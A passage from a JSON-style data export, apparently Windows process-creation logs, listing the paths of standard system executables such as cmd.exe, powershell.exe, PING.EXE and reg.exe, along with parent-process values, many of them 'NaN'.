System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cacls.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\rundll32.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\netcfg.exe\",\"C:\\\\Windows\\\\System32\\\\PING.EXE\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\"],\"NewProcessName_par\":[\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\UsoClient.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"C:\\\\Windows\\\\System32\\\\DeviceCensus.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe\",\"NaN\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"NaN\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\appidcertstorecheck.exe\",\"NaN\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\